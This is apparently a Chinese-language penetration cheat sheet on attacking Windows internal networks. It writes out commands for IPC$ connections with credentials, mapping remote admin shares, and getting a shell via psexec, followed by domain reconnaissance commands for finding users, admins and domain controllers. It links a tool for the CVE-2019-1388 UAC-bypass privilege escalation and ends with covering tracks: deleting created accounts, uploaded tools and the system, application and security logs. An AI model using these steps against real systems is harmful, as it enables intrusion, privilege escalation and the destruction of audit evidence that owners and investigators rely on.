内网渗透姿势

IPC$ 命令

连接命令 : net use \\IP\ipc$ "密码" /user:"用户名" 。

共享硬盘命令 : net use Z: \\IP\c$   将c盘映射到本地 Z 盘。

获得$IPC连接后,使用psexecgetshell。 命令:psexec \\192.168.xx.xx -u administrator cmd.exe


内网域信息收集命令

net user /domain                                           #查看域用户

net view /domain                                           #查看有几个域

net vire /domain:xxx                                      #查看域内主机

net group /domain                                         #查看域里面的组

net group "domain computers" /domain        #查看域内所有的主机名

net group "domain admins" /domain             #查看域管理员

net group "domain controllers" /domain        # 查看域控制器

net time /domain                                           #查看时间服务器


提权

内网渗透姿势_第1张图片

|| cve-2019-1388  证书对话框提权漏洞,属于bypassUAC,已复现,简单好用

所需工具链接:https://github.com/jas502n/CVE-2019-1388/blob/master/HHUPD.EXE , 工具不是一键提权,只是提供了一个重要功能,具体步骤请找度娘或者google大


擦屁股

删除创建的账户

删除所有上传的工具

删除应用、系统和安全日志

你可能感兴趣的:(内网渗透姿势)